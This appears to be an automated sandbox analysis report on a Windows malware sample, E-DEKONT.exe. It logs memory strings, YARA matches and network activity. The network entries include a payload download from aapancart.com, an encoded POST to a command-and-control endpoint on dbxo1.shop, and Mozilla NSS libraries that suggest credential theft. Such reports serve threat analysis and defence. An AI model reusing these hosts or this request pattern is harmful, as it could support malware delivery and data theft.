Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.com0
Source: E-DEKONT.exe, 00000004.00000001.108602069162.00000000005F2000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: E-DEKONT.exe, 00000004.00000001.108602069162.00000000005F2000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: E-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aapancart.com/DOHx
Source: E-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aapancart.com/qO
Source: E-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aapancart.com/rufZpHlxPMyoMZPqPua74.rar
Source: E-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aapancart.com/rufZpHlxPMyoMZPqPua74.rarzJ
Source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: 444685002784711619507383.tmp.4.dr String found in binary or memory: https://login.live.com/
Source: E-DEKONT.exe, 00000004.00000003.108965513435.0000000001AD1000.00000004.00000020.00020000.00000000.sdmp, 444685002784711619507383.tmp.4.dr String found in binary or memory: https://login.live.com//
Source: 444685002784711619507383.tmp.4.dr String found in binary or memory: https://login.live.com/https://login.live.com/
Source: E-DEKONT.exe, 00000004.00000003.108965513435.0000000001AD1000.00000004.00000020.00020000.00000000.sdmp, 444685002784711619507383.tmp.4.dr String found in binary or memory: https://login.live.com/v104
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown HTTP traffic detected: POST /db1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo1.shopContent-Length: 103Cache-Control: no-cacheData Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 34 70 9d 33 70 9d 36 13 ec 47 70 9d 31 11 8b 31 11 eb 46 16 8b 30 63 8b 30 6c 8b 30 63 eb 40 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp4p3p6Gp11F0c0l0c@
Source: unknown DNS traffic detected: queries for: aapancart.com
Source: global traffic HTTP traffic detected: GET /rufZpHlxPMyoMZPqPua74.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aapancart.comCache-Control: no-cache
Source: unknown HTTPS traffic detected: 103.14.99.114:443 -> 192.168.11.20:49851 version: TLS 1.2
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_00405425

System Summary

barindex
Source: 4.2.E-DEKONT.exe.1df8883c.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 4.2.E-DEKONT.exe.1df32afc.3.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 4.2.E-DEKONT.exe.1df37450.4.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: E-DEKONT.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 4.2.E-DEKONT.exe.1df8883c.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 4.2.E-DEKONT.exe.1df32afc.3.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 4.2.E-DEKONT.exe.1df37450.4.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403373
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00404C62 1_2_00404C62
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00406ADD 1_2_00406ADD
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_004072B4 1_2_004072B4
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B804ED 1_2_02B804ED
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B62305 1_2_02B62305
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B66CB5 1_2_02B66CB5
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B69092 1_2_02B69092
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B6D49E 1_2_02B6D49E
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B66E85 1_2_02B66E85
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B67288 1_2_02B67288
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B66EF6 1_2_02B66EF6
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B684E1 1_2_02B684E1
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B66CCE 1_2_02B66CCE
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B67020 1_2_02B67020
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B83A1C 1_2_02B83A1C
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B85012 1_2_02B85012
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B82873 1_2_02B82873
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B66E56 1_2_02B66E56
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B8525A 1_2_02B8525A
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B67E58 1_2_02B67E58
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B67394 1_2_02B67394
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B80790 1_2_02B80790
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B80196 1_2_02B80196
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B66DF3 1_2_02B66DF3
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B66FCB 1_2_02B66FCB
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B80D36 1_2_02B80D36
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B62329 1_2_02B62329
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B66D12 1_2_02B66D12
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B6230C 1_2_02B6230C
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B6850C 1_2_02B6850C
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B83D61 1_2_02B83D61
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B66F69 1_2_02B66F69
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B69142 1_2_02B69142
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B62348 1_2_02B62348
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B67148 1_2_02B67148
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 4_2_0168530A 4_2_0168530A
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 4_2_01685292 4_2_01685292
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 4_2_01685294 4_2_01685294
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B84F02 NtProtectVirtualMemory, 1_2_02B84F02
Source: api-ms-win-core-processthreads-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: E-DEKONT.exe, 00000004.00000003.108887027855.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108944571274.000000001E798000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108910048005.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108884832188.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108944393476.000000001E788000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108901775165.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108893462615.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108890563485.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108908823587.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108911584847.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108910182410.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108885416848.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108940725893.000000001E730000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108903955995.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108963064431.000000001DDA8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108909446480.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108943979243.000000001E774000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108943865478.000000001E770000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108938291383.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108897608996.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
